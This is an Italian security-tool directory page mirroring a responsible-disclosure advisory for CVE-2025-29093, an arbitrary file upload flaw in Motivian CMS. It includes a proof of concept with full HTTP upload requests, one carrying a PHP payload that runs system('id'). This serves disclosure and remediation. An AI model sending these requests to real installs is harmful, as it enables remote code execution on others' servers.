Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-29093-Arbitrary-File-Upload — Questo repository rivela una vulnerabilità di sicurezza scoperta in Motivian Content Management System v.41.0.0 | Kitploit
Strumenti/GitHubGitHub/framarcuccio/cve-2025-29093-arbitrary-file-upload
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubframarcuccio/cve-2025-29093-arbitrary-file-upload

CVE-2025-29093-Arbitrary-File-Upload

Questo repository rivela una vulnerabilità di sicurezza scoperta in Motivian Content Management System v.41.0.0

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-29093-Caricamento-Arbitrario-di-File

Questo repository rivela una vulnerabilità di sicurezza scoperta in Motivian Content Management System v.41.0.0.

  • CVE-2025-29093: Caricamento Arbitrario di File

Questa vulnerabilità è stata segnalata al venditore secondo le pratiche di divulgazione responsabile, e a MITRE, che ha assegnato un ID CVE temporaneo. I dettagli vengono resi pubblici dopo la scadenza del periodo di divulgazione di 45 giorni.

Informazioni Generali

  • Titolo: Motivian Caricamento Arbitrario di File
  • Tipo di Vulnerabilità: Caricamento Arbitrario di File
  • Vendor del Prodotto: Motivian
  • Prodotto: Motivian Content Management System
  • Versione Interessata: Motivian CMS v.41.0.0
  • Componente Interessato: Content/Gallery/Images
  • Vettore di Attacco: Remoto
  • Impatto: Caricamento arbitrario di file dannoso
  • Gravità: Media
  • CVSSv3 score: 6.5
  • CVSSv3 vector: CVSS:3.1:AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
  • Gravità secondo CISA-ADP: Alta
  • CVSSv3 score by CISA-ADP: 8.2
  • CVSSv3 vector by CISA-ADP: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
  • Trovata: 2025-02-03
  • Da: Francesco Marcuccio
  • Stato: Segnalato al venditore il 7 aprile 2025 - Nessuna risposta/risoluzione ricevuta entro il 22 maggio 2025
  • Descrizione

    La vulnerabilità di caricamento file in Motivian Content Management System v.41.0.0 consente a un attaccante remoto di caricare file arbitrari con estensioni create ad hoc (ad es. .php, .png, .txt) contenenti codice dannoso, tramite il componente Content/Gallery/Images.

    Prova di Concetto

    La vulnerabilità può essere sfruttata caricando file con varie estensioni. A scopo dimostrativo, sono stati utilizzati due casi di prova: uno riguardante un file .php contenente codice dannoso, e un altro utilizzando un file .txt con la stringa di test EICAR. Entrambi i file sono stati caricati tramite il componente Content/Gallery/Images.

    Di seguito è riportata la trascrizione completa delle richieste e risposte HTTP utilizzate per dimostrare il problema:

    Richiesta Burp EICAR

    root@kitploit:~
    POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
    Host: [REDACTED]
    Content-Length: 808
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: [REDACTED]
    Connection: close
    
    ------WebKitFormBoundary2oYL3KVZBlAQmYAA
    Content-Disposition: form-data; name="resFolderId"
    
    -8
    ------WebKitFormBoundary2oYL3KVZBlAQmYAA
    Content-Disposition: form-data; name="allowedExtensions"
    
    
    ------WebKitFormBoundary2oYL3KVZBlAQmYAA
    Content-Disposition: form-data; name="hidePageComponents"
    
    false
    ------WebKitFormBoundary2oYL3KVZBlAQmYAA
    Content-Disposition: form-data; name="struts.token.name"
    
    token
    ------WebKitFormBoundary2oYL3KVZBlAQmYAA
    Content-Disposition: form-data; name="token"
    
    M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
    ------WebKitFormBoundary2oYL3KVZBlAQmYAA
    Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
    Content-Type: text/plain
    
    X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
    ------WebKitFormBoundary2oYL3KVZBlAQmYAA--
    

    Richiesta Burp PHP

    root@kitploit:~
    POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
    Host: [REDACTED]
    Content-Length: 789
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: [REDACTED]
    Connection: close
    
    ------WebKitFormBoundaryLdWSMj4ASbAC9uOz
    Content-Disposition: form-data; name="resFolderId"
    
    304802
    ------WebKitFormBoundaryLdWSMj4ASbAC9uOz
    Content-Disposition: form-data; name="allowedExtensions"
    
    
    ------WebKitFormBoundaryLdWSMj4ASbAC9uOz
    Content-Disposition: form-data; name="hidePageComponents"
    
    false
    ------WebKitFormBoundaryLdWSMj4ASbAC9uOz
    Content-Disposition: form-data; name="struts.token.name"
    
    token
    ------WebKitFormBoundaryLdWSMj4ASbAC9uOz
    Content-Disposition: form-data; name="token"
    
    77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
    ------WebKitFormBoundaryLdWSMj4ASbAC9uOz
    Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
    Content-Type: application/octet-stream
    
    <?php 
    echo system('id'); 
    ?>
    ------WebKitFormBoundaryLdWSMj4ASbAC9uOz--
    

    Risposta Burp

    root@kitploit:~
    HTTP/1.1 200 OK
    Connection: close
    Date: Thu, 06 Feb 2025 10:26:29 GMT
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: it-IT
    Content-Length: 16729
    

    Rimedio

    Non consentire agli utenti di caricare file arbitrari. Implementare una rigorosa validazione dei file (tipo MIME e ispezione del contenuto), randomizzare i nomi dei file e limitare le directory di upload.

    Cronologia della Divulgazione

    DataAzione
    2025-02-06Richiesta ID CVE (CNA: MITRE)
    2025-04-02Assegnazione ID CVE
    2025-04-07Vulnerabilità segnalate al venditore
    2025-05-31Divulgazione pubblica dopo la scadenza del periodo di divulgazione di 45 giorni (54 giorni totali)
    2025-06-04Registrazione ufficiale e inserimento nel database MITRE e nel portale NIST/NVD

    Crediti

    • Scoperta e divulgata responsabilmente da:
      Francesco Marcuccio
      Consulente di CyberSecurity, Penetration Tester

    • Attribuzione dello scopritore MITRE elencata come:
      Francesco Marcuccio
      Consulente di CyberSecurity, Penetration Tester

    Link

    Link di riferimento: MITRE NIST

    Stato

    Questo ID CVE è ufficialmente in stato PUBLISHED. Sarà aggiornato con il punteggio CVSS da NIST, dopo l'analisi.

    Scarica lo strumento